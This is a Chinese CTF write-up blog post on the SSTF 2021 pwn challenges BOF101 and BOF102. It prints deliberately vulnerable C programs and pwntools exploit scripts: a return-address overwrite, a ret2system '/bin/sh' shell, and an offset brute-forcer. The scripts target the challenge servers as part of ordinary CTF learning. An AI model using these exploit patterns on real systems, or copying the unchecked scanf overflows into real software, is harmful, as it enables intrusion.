ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

SCTF2021--WP

BOF101

https://blog.restro.cn/wp-content/uploads/2021/08/image-39.png

源文件.c

#include <stdio.h>
//#include <fcntl.h>
//#include <unistd.h>
#include <stdlib.h>
#include <string.h>

void printflag(){ 
	char buf[32];
	FILE* fp = fopen("/flag", "r"); 
	fread(buf, 1, 32, fp);
	fclose(fp);
	printf("%s", buf);
	fflush(stdout);
}

int main() {
	int check=0xdeadbeef;
	char name[140];
	printf("printflag()'s addr: %p\n", &printflag);
	printf("What is your name?\n: ");
	fflush(stdout);
	scanf("%s", name);	
	if (check != 0xdeadbeef){
		printf("[Warning!] BOF detected!\n");
		fflush(stdout);
		exit(0);
	}
	return 0;
}

ida

https://blog.restro.cn/wp-content/uploads/2021/08/image-40.png

发现只要使得check一样,然后直接返回地址到getflag就好了

https://blog.restro.cn/wp-content/uploads/2021/08/image-41.png

EXP

from pwn import*
p=remote("bof101.sstf.site",1337)
p.recvuntil("What is your name?\n")
payload = 'a'*140 + p32(0xdeadbeef).decode("iso-8859-1") + p64(0).decode("iso-8859-1")  + p64(0x555555555229).decode("iso-8859-1")
p.sendline(payload)
p.interactive()

一开始没有找到附件,,我还以为是个brop,所以写了个offset爆破脚本

爆破脚本

from pwn import *
def get_offset():
    i = 1
    while 1:
        try:
            p=remote("bof101.sstf.site",1337)
            p.recvuntil("What is your name?\n")
            payload = 'a' * i
            print "Now the payload is ",payload
            p.sendline(payload)
            data = p.recvall()
            p.close()
            aaa = "[Warning!] BOF detected!"
            if aaa in data:
                return i
            else:
                i+=1

        except EOFError:
            p.close()
            print "Success,EOFError,Stack is overflow..."
            return i-1
size = get_offset()
print "offset is ",size

BOF102

这,,说是栈溢出的加强版,,然后好像就是考的一个栈溢出

https://blog.restro.cn/wp-content/uploads/2021/08/image-42.png

文件源码.c

#include <stdio.h>
#include <stdlib.h>

char name[16];

void bofme() {
	char payload[16];

	puts("What's your name?");
	printf("Name > ");
	fflush(stdout);
	scanf("%16s", name);
	printf("Hello, %s.\n", name);

	puts("Do you wanna build a snowman?");
	printf(" > ");
	fflush(stdout);
	scanf("%s", payload);
	printf("!!!%s!!!\n", payload);
	puts("Good.");
}

int main() {
	system("echo 'Welcome to BOF 102!'");
	bofme();
	return 0;
}

ida

https://blog.restro.cn/wp-content/uploads/2021/08/image-43.png
https://blog.restro.cn/wp-content/uploads/2021/08/image-44.png

附件中还给了俩32位小程序文件,,但是好像这个题目用不到,,我有点懵,为啥要给,

很明显,给了system但是没给/bin/sh,但是给了一个bss写入点,所以应该是写入bss段,然后去执行,题目只开了nx保护,栈溢出在下面的v1的是scanf处,所以只要写入,然后返回执行就可以了

https://blog.restro.cn/wp-content/uploads/2021/08/image-45.png

EXP

from pwn import*
p=remote("bof102.sstf.site",1337)
p.recvuntil("Name >")
p.sendline("/bin/sh")
p.recvuntil(" >")
payload = 'a'*20 +p32(0x80483E0)+ p32(0)+p32(0x804A034)
p.sendline(payload)
p.interactive()

发表评论

textsms
account_circle
email

ReStr0-Blog

SCTF2021--WP
BOF101 源文件.c #include <stdio.h> //#include <fcntl.h> //#include <unistd.h> #include <stdlib.h> #include <string.h> void printflag(){ char buf[3…
扫描二维码继续阅读
2021-08-16